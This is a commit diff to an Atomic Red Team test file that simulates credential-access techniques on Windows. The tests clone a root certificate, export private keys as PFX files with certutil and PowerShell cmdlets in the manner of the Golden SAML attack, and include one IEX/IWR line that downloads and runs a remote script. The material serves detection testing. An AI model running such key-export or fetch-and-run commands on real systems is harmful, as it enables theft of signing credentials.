Update T1552.004.yaml
This commit is contained in:
Michael Haag
@@ -199,16 +199,76 @@ atomic_tests:
|
||||
name: powershell
|
||||
- name: CertUtil ExportPFX
|
||||
description: |
|
||||
The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
|
||||
The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
|
||||
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
|
||||
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
|
||||
Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
output:
|
||||
description: file path to export to
|
||||
type: Path
|
||||
default: c:\temp\atomic.pfx
|
||||
password:
|
||||
description: password for cert
|
||||
type: String
|
||||
default: password
|
||||
executor:
|
||||
command: |
|
||||
IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
|
||||
certutil -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\temp\atomic.pfx
|
||||
certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
|
||||
cleanup_command: |
|
||||
Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
elevation_required: true
|
||||
- name: Export Root Certificate with Export-PFXCertificate
|
||||
description: |
|
||||
Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
|
||||
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
pfx_path:
|
||||
description: output path of the certificate
|
||||
type: String
|
||||
default: $env:Temp\atomicredteam.pfx
|
||||
executor:
|
||||
command: |
|
||||
$mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
|
||||
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
|
||||
Set-Location Cert:\LocalMachine\My
|
||||
Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
|
||||
cleanup_command: |
|
||||
try {
|
||||
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
|
||||
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
|
||||
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
|
||||
} catch { }
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Export Root Certificate with Export-Certificate
|
||||
description: |
|
||||
Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
|
||||
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
pfx_path:
|
||||
description: Path of the certificate
|
||||
type: Path
|
||||
default: $env:Temp\AtomicRedTeam.cer
|
||||
executor:
|
||||
command: |
|
||||
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
|
||||
Set-Location Cert:\LocalMachine\My
|
||||
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
|
||||
cleanup_command: |
|
||||
try {
|
||||
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
|
||||
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
|
||||
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
|
||||
}
|
||||
catch { }
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
Reference in New Issue
Block a user